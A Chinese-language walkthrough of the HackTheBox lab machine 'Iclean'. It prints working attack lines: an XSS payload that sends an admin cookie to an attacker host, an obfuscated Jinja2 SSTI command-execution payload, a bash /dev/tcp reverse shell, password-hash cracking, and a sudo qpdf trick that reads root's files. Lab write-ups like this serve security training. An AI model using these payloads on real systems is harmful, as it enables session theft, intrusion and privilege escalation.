Iclean

Enumeration

nmap

先使用默认规则扫描常用的端口，发现对外开放了 22 和 80 端口，然后扫描这两个端口的详细信息，结果如下，很常规的结果，没发现什么有趣的东西

┌──(kali㉿kali)-[~/vegetable/HTB/Iclean]
└─$ nmap -sV -sC -p 22,80 -oA nmap 10.10.11.12 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-08 05:16 EDT
Nmap scan report for 10.10.11.12
Host is up (0.98s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2cf90777e3f13a36dbf23b94e3b7cfb2 (ECDSA)
|_  256 4a919ff274c04181524df1ff2d01786b (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.96 seconds

TCP/80

先从 Web 开始探索，访问 80 端口。可以看到网站跳转至 capliclean.htb（下图），将域名添加至 /etc/hosts 文件中，在 kali 中执行下面的指令

echo '10.10.11.12 capiclean.htb' | sudo tee -a /etc/hosts

添加完成后，刷新页面，然后在 wapplayzer 中看到服务使用了 python 和 Flask，同时使用 gobuster 等任意目录扫描器扫描 Web 目录

Exploitation

xss

/quote，界面如下所示，可以填写自己的邮箱

测试填写并提交后，出现下面的提示，您的报价请求已发送给我们的管理团队。他们将很快通过电子邮件与您联系。感谢您对我们的服务表现出的兴趣。

邮箱地址会发给管理员，测试是否存在 xss，按照如下格式写一个简单的 payload，同时在 kali 中开启 Web 服务，监听 80 端口。

在 BurpSuite 中发送后，过一会，收到了如下响应，可以看到 10.10.11.12 主机访问了 Web

修改 payload 为如下指令，然后按照同样的方式，可以获取到管理员的 cookie

<img src=x onerror=fetch('http://10.10.14.13/'+document.cookie);>

在 kali 端，会收到管理员的 cookie

之前扫描目录发现存在 dashboard 目录，使用刚才获得的 cookie 来访问 dashboard，可以直接以管理员身份登录管理员面板。使用浏览器插件 EditThisCookie，按照如下方式配置

访问 /dashboard

在 Generate Invoice 处填写对应信息后，可以生成一个 id

在 Generate QR 处，输入刚才获取到的 id，点击 Genrate 会生成下面的 QR Code Link，填写 test1234 后点击 submit

SSTI

测试 qr_link 处存在 ssti 漏洞，参数为 test1234 时服务器响应如下

参数为 {{7*7}} 时，服务器响应如下，将 7*7 进行了计算，得到结果 49

可以按照如下方式判断使用的模版引擎是什么

按照刚才那个图进行初步的判断，推测可能使用的是 Jinja2 或 Twig 等引擎

使用以下 payload，可以执行系统命令 id，显示结果如下

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("id")|attr("read")()}}

将 id 替换为下面的反向 shell 连接脚本，同时在 kali 中监听 127.0.0.1

bash -c 'bash -i >& /dev/tcp/10.10.14.13/4444 0>&1'

在 BurpSuite 中发送后，在监听端得到一个 shell，使用 python 升级 shell

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.12] 51176
bash: cannot set terminal process group (1208): Inappropriate ioctl for device
bash: no job control in this shell
www-data@iclean:/opt/app$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

在当前目录下，发现 app.py，打开发现里面有数据库的用户名和密码

db_config = {'host': '127.0.0.1','user': 'iclean','password': 'pxCsmnGLckUb','database': 'capiclean'
}

登录数据库，并查看有哪些数据库

www-data@iclean:/opt/app$ mysql -h 127.0.0.1 -uiclean   
mysql -h 127.0.0.1 -uiclean 
ERROR 1045 (28000): Access denied for user 'iclean'@'localhost' (using password: NO)
www-data@iclean:/opt/app$ mysql -h localhost -u iclean -p
mysql -h localhost -u iclean -p
Enter password: pxCsmnGLckUbWelcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5367
Server version: 8.0.36-0ubuntu0.22.04.1 (Ubuntu)Copyright (c) 2000, 2024, Oracle and/or its affiliates.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| capiclean          |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)

使用 capiclean 数据库，查看数据库中存在哪些表

mysql> use capiclean;
use capiclean;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+---------------------+
| Tables_in_capiclean |
+---------------------+
| quote_requests      |
| services            |
| users               |
+---------------------+
3 rows in set (0.00 sec)

查看 users 表中的内容

mysql> select * from users;
select * from users;
+----+----------+------------------------------------------------------------------+----------------------------------+
| id | username | password                                                         | role_id                          |
+----+----------+------------------------------------------------------------------+----------------------------------+
|  1 | admin    | 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51 | 21232f297a57a5a743894a0e4a801fc3 |
|  2 | consuela | 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa | ee11cbb19052e40b07aac0ca060c23ee |
+----+----------+------------------------------------------------------------------+----------------------------------+
2 rows in set (0.00 sec)

使用 hash-identifier 识别 hash 类型

┌──(kali㉿kali)-[~/vegetable/HTB/Iclean]
└─$ hash-identifier##########################################################################     __  __                     __           ______    _____           ##    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         ##    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        ##     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       ##      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      ##       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      ##        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 ##                                                             By Zion3R ##                                                    www.Blackploit.com ##                                                   Root@Blackploit.com ##########################################################################
--------------------------------------------------HASH: 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aaPossible Hashs:
[+] SHA-256
[+] Haval-256

保存 hash 值，使用 john 暴力破解 hash 内容

┌──(kali㉿kali)-[~/vegetable/HTB/Iclean]
└─$ john hashs.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simple and clean (?)     
1g 0:00:00:01 DONE (2024-04-09 05:39) 0.8474g/s 12155Kp/s 12155Kc/s 15348KC/s (454579)..*7¡Vamos!
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.

破解得到 consuela 用户的密码，可以使用 su 切换用户，或者通过 ssh 登录

┌──(kali㉿kali)-[~]
└─$ ssh consuela@10.10.11.12
consuela@10.10.11.12's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/proSystem information as of Tue Apr  9 09:44:25 AM UTC 2024Expanded Security Maintenance for Applications is not enabled.3 updates can be applied immediately.
To see these additional updates run: apt list --upgradableEnable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro statusYou have mail.
consuela@iclean:~$

Privilege Escalation

qdpf

发现可以执行 qdpf

consuela@iclean:~$ sudo -l
[sudo] password for consuela: 
Matching Defaults entries for consuela on iclean:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser consuela may run the following commands on iclean:(ALL) /usr/bin/qpdf

在网上搜索发现 qdpf 是一个内容转换工具，参考 GitHub - qpdf/qpdf： QPDF：内容保存 PDF 文档转换器

也可以找到操作文档 QPDF version 11.9.0 — QPDF 11.9.0 documentation

按照如下操作指令可以直接读取 root.txt 并保存

consuela@iclean:/tmp$ sudo /usr/bin/qpdf --empty /tmp/root.txt --qdf --add-attachment /root/root.txt --
consuela@iclean:/tmp$ ls
puppeteer_dev_chrome_profile-XXXXXXnAeCKd
root.txt
systemd-private-8706baeab0d84ce5a947af309e04853a-apache2.service-1mKxWm
systemd-private-8706baeab0d84ce5a947af309e04853a-fwupd.service-npY1wd
systemd-private-8706baeab0d84ce5a947af309e04853a-ModemManager.service-EykwjH
systemd-private-8706baeab0d84ce5a947af309e04853a-systemd-logind.service-imyqKP
systemd-private-8706baeab0d84ce5a947af309e04853a-systemd-resolved.service-MoBxZS
systemd-private-8706baeab0d84ce5a947af309e04853a-systemd-timesyncd.service-dt8vP0
systemd-private-8706baeab0d84ce5a947af309e04853a-upower.service-qo4P4J
vmware-root_769-4248090657

参考链接：

SSTI (Server Side Template Injection) | HackTricks | HackTricks

GitHub - qpdf/qpdf： QPDF：内容保存 PDF 文档转换器

QPDF version 11.9.0 — QPDF 11.9.0 documentation